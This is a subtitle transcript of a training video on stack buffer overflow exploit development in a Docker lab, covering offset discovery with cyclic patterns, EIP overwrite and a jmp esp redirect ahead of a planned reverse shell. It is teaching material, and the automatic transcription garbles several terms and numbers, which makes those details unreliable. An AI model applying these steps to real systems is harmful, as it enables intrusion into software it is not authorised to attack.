1
00:00:01,110 --> 00:00:01,550
All right.

2
00:00:01,560 --> 00:00:07,710
Welcome back to part three of our reboot for Introduction to Exploit Development Within Containers.

3
00:00:08,520 --> 00:00:15,450
So at this point, we want to perform a jump call command to find a way to land into the center stack

4
00:00:15,450 --> 00:00:18,690
pointer because look at our original exploit code right now.

5
00:00:18,690 --> 00:00:28,050
So we know that the extended stack pointer can hold our buffer of C's and we call it shell code space.

6
00:00:28,410 --> 00:00:38,760
So let's use the command jump call and look specifically for calls that specifically say jump to the

7
00:00:38,760 --> 00:00:42,090
extent of stack pointer because we know it's at least 200 bytes.

8
00:00:42,480 --> 00:00:44,880
I have tried this with the latest version of Metasploit.

9
00:00:44,880 --> 00:00:48,570
So 200 bytes is more than enough to fit shell code.

10
00:00:49,170 --> 00:00:55,620
You can pick any of these instructions right here or here or here as long as it lands at the ESP.

11
00:00:55,650 --> 00:01:02,460
Because in our previous video we dump the extended stack pointer in its location, we dump 200 bytes

12
00:01:02,790 --> 00:01:06,990
and we found out it's more than enough adequate space to fit our shell code.

13
00:01:07,650 --> 00:01:12,510
So let's make a note in our exploit control c.

14
00:01:14,850 --> 00:01:16,200
Go back to our editor

15
00:01:20,610 --> 00:01:22,830
and then we're going to comment this out.

16
00:01:25,960 --> 00:01:28,720
And we're actually going to comment out IP.

17
00:01:29,170 --> 00:01:31,570
So there's actually two ways that you can do this.

18
00:01:31,600 --> 00:01:39,910
Normally what you would have done in the previous version of my course is IP equals bytes, and then

19
00:01:39,910 --> 00:01:42,610
you reverse each byte, including the first one.

20
00:01:43,120 --> 00:01:48,130
So it will be x6f slash hex

21
00:01:48,130 --> 00:01:53,860
c6x04x08.

22
00:01:54,010 --> 00:01:56,320
However, we don't need to do that anymore.

23
00:01:56,350 --> 00:02:01,960
In fact, I'm going to show you a different way because offensive security, you learn security.

24
00:02:01,960 --> 00:02:07,000
And a lot of these people that are on these write ups opt for 32 bit exploitation.

25
00:02:07,090 --> 00:02:09,280
They keep on talking about reversing the bias.

26
00:02:09,280 --> 00:02:14,260
But what they're really trying to get to you is that they're trying to tell you about indianness.

27
00:02:15,130 --> 00:02:22,450
But what we can do now, especially once you get to the drop chain section, this would be very convenient.

28
00:02:23,710 --> 00:02:24,370
What's this?

29
00:02:25,480 --> 00:02:38,080
It must have hit some dumb command IP equals struct that pack single quote lower symbol capital l and

30
00:02:38,080 --> 00:02:41,470
then copy the memory address right here.

31
00:02:42,580 --> 00:02:45,670
So this does the exact same thing as this.

32
00:02:47,320 --> 00:02:52,240
And what it does is that it actually packs it as little.

33
00:02:52,600 --> 00:02:55,610
So this lower sign I'm highlighting right here.

34
00:02:55,630 --> 00:02:56,710
Let me see if I can zoom in.

35
00:02:57,550 --> 00:03:07,780
This lower sign right here is a packet as little Indian and L capital L stands for Long Integer, which

36
00:03:07,780 --> 00:03:10,720
means a four byte memory address, basically.

37
00:03:13,570 --> 00:03:16,030
So let's run our exploit again.

38
00:03:17,080 --> 00:03:18,370
Let me just zoom out.

39
00:03:22,000 --> 00:03:22,390
Control.

40
00:03:22,390 --> 00:03:32,290
C Go back to our exploit so control b z to execute zoom nano exploit that py and then want to clear

41
00:03:32,290 --> 00:03:33,430
all of this out.

42
00:03:34,990 --> 00:03:38,440
They want to control shift C to copy all of this in.

43
00:03:40,600 --> 00:03:48,370
So what I expect to happen is that it's going to take the jump USB call, it's going to crash where

44
00:03:48,370 --> 00:03:51,580
the keys are at because it doesn't know what it means.

45
00:03:54,020 --> 00:03:56,140
And then we're going to run our payload.

46
00:03:57,680 --> 00:03:59,950
Just we just need to make sure that our payload works.

47
00:03:59,980 --> 00:04:01,270
Let me just exit this.

48
00:04:02,060 --> 00:04:04,440
Run peak 80.

49
00:04:04,520 --> 00:04:07,230
83.

50
00:04:07,250 --> 00:04:09,620
Exploit tight control.

51
00:04:09,640 --> 00:04:10,190
See?

52
00:04:15,380 --> 00:04:21,570
As you can see, we have been redirected to the extended stack pointer where the keys are at.

53
00:04:21,579 --> 00:04:28,540
So it did take the jump to the extent stack pointer and this is where we get to have our shell code

54
00:04:28,540 --> 00:04:29,290
placed in.

55
00:04:30,040 --> 00:04:34,330
So wait till our next moment where we will generate our exploit code.

56
00:04:34,960 --> 00:04:40,780
So I'm actually kind of a busy man, but you can actually go into reversing bad bytes or finding the

57
00:04:40,780 --> 00:04:45,280
bad bytes in our previous 2019 edition of our class.

58
00:04:45,970 --> 00:04:53,500
But tomorrow in our next section, we're going to go over how to generate the proper shell code.

59
00:04:59,260 --> 00:04:59,500
All right.

60
00:04:59,500 --> 00:05:01,840
I just made it a little bit of an error.

61
00:05:02,200 --> 00:05:03,730
I actually missed one line.

62
00:05:04,030 --> 00:05:07,850
So what I want you to do is copy and paste the code right here.

63
00:05:07,870 --> 00:05:11,290
I forgot to actually write it into the file, as you can see.

64
00:05:11,290 --> 00:05:12,520
So I missed one line.

65
00:05:13,360 --> 00:05:19,090
But going back to our original development methodology, we're going to crash the program.

66
00:05:19,510 --> 00:05:22,900
So run dash p 8080.

67
00:05:24,010 --> 00:05:32,650
Make sure that your exploit has a new code right here, which is w write the right buffer.

68
00:05:34,830 --> 00:05:36,240
Python three exploit.

69
00:05:36,450 --> 00:05:36,970
Hi.

70
00:05:37,740 --> 00:05:41,550
Now to finish request, we must control C out of it.

71
00:05:43,200 --> 00:05:44,550
And we see a crash.

72
00:05:45,930 --> 00:05:46,950
We noticed.

73
00:05:46,950 --> 00:05:53,700
If you do this, if you go press control B up you'll go to the up to the up pane.

74
00:05:54,000 --> 00:06:02,220
So now press control b z to zoom in and we notice that IP is overridden by four A's.

75
00:06:02,220 --> 00:06:11,850
So previously in our older 2019 version of the class, I said that we're going to use MSF under pattern

76
00:06:11,850 --> 00:06:12,450
create.

77
00:06:12,450 --> 00:06:20,400
You can use either or, but we can also use the pattern create feature within good debugger petta so

78
00:06:20,400 --> 00:06:25,260
we can do this pattern create 1400.

79
00:06:27,840 --> 00:06:37,110
So make sure you copy only what's within the single quotes, and then we're going to update our exploit

80
00:06:37,110 --> 00:06:37,620
again.

81
00:06:39,480 --> 00:06:45,330
So we're going to change this code that out buffer.

82
00:06:45,690 --> 00:06:51,610
Sorry, I got a text buffer equals B remember not forget about your B, all right.

83
00:06:51,630 --> 00:06:58,620
This specifies bytes in Python three and then we copy and paste our cyclic pattern.

84
00:06:59,070 --> 00:07:08,820
Remember, this is called a cyclic pattern, and cyclic patterns map out sections of the buffer.

85
00:07:11,090 --> 00:07:16,550
So we're going to copy our new exploit into our Docker container.

86
00:07:23,590 --> 00:07:28,900
Nano exploit that pi lead everything.

87
00:07:33,870 --> 00:07:34,950
And then save it again.

88
00:07:35,880 --> 00:07:38,550
Run up 80.

89
00:07:38,550 --> 00:07:39,150
80.

90
00:07:43,220 --> 00:07:45,620
Python three exploit pi.

91
00:07:47,840 --> 00:07:49,340
And then control the out of it.

92
00:07:50,720 --> 00:07:52,220
And we're going to find this.

93
00:07:52,220 --> 00:08:00,530
So go back up to the top, pain control Z to zoom in and we find out that IP is written by the strange

94
00:08:00,530 --> 00:08:01,190
screen.

95
00:08:01,760 --> 00:08:05,810
So we can actually use the debugging extensions.

96
00:08:05,810 --> 00:08:09,410
We'll think anew, debug or peda to search for our offset.

97
00:08:09,980 --> 00:08:12,110
So pattern search.

98
00:08:13,580 --> 00:08:14,810
Copy and paste this.

99
00:08:17,540 --> 00:08:25,370
It's quite informative, but what it's saying is that our bass pointer is overwritten at 1044 bytes.

100
00:08:25,730 --> 00:08:29,540
Our instruction pointer is written at 10,048 bytes.

101
00:08:29,570 --> 00:08:30,070
I'm sorry.

102
00:08:30,080 --> 00:08:36,200
My father is just like running some sort of stupid, like, woodworking kind of thing, so he probably

103
00:08:36,440 --> 00:08:37,250
couldn't hear it.

104
00:08:37,280 --> 00:08:38,360
I hope you don't hear it.

105
00:08:38,360 --> 00:08:45,800
And our extended, extended stack pointer is overridden starting at 1052 bytes.

106
00:08:47,480 --> 00:08:50,930
So we need to now verify that this actually works.

107
00:08:50,930 --> 00:08:51,500
Right.

108
00:08:52,100 --> 00:08:59,840
So we need to now change our exploit again to make sure that we can correctly overwrite IP reliably,

109
00:08:59,840 --> 00:09:01,760
which is the extended instruction pointer.

110
00:09:03,080 --> 00:09:04,610
So let's comment this out

111
00:09:08,000 --> 00:09:23,840
and let's make a new variable call overflow equals B A times 1048 and then we'll have another one called

112
00:09:23,870 --> 00:09:29,780
IP equals B capital B times four.

113
00:09:32,030 --> 00:09:34,280
And then we're going to write another variable.

114
00:09:35,450 --> 00:09:47,210
Let's just call it show code space equals B, time C or Python C.

115
00:09:50,580 --> 00:09:51,570
Times.

116
00:09:54,480 --> 00:09:55,470
1048.

117
00:09:55,620 --> 00:09:57,000
Minus four.

118
00:09:57,630 --> 00:09:59,590
So 40.

119
00:09:59,850 --> 00:10:01,200
100 minus ten.

120
00:10:01,200 --> 00:10:01,980
48.

121
00:10:01,980 --> 00:10:02,940
Minus four.

122
00:10:04,110 --> 00:10:15,120
So now our buffer is going to be buffer equals overflow plus IPI plus shell code space.

123
00:10:18,080 --> 00:10:21,200
So let's copy and paste this into our container.

124
00:10:26,680 --> 00:10:26,980
Patrol.

125
00:10:26,980 --> 00:10:28,480
Busy to stop the zoo.

126
00:10:29,290 --> 00:10:31,270
Nano exploit pi.

127
00:10:41,330 --> 00:10:53,540
Restart the debugger dash p 8080 Python three exploit py control c to stop and control z to zoom back

128
00:10:53,540 --> 00:11:03,770
in and notice that we actually correctly found our exact buffer overwrite and it's then a stack pointer.

129
00:11:03,800 --> 00:11:11,330
So if you do something like x/1 hundred x esp.

130
00:11:13,650 --> 00:11:15,030
Hex 43.

131
00:11:15,060 --> 00:11:20,040
Is actually the hex for Capital C?

132
00:11:22,530 --> 00:11:29,460
We can actually calculate how much time or how many C's that we have, but we already printed 100 bytes

133
00:11:29,790 --> 00:11:32,670
so we can do 200.

134
00:11:34,140 --> 00:11:38,730
We have more than enough bytes to put in a basic reverse command shell.

135
00:11:39,930 --> 00:11:43,470
So this covers the end of our IP overwrite.

136
00:11:45,600 --> 00:11:52,170
In our later video we will find a jump call towards ESP because this is where we're going to put in

137
00:11:52,170 --> 00:11:54,210
our knop sled and shell code.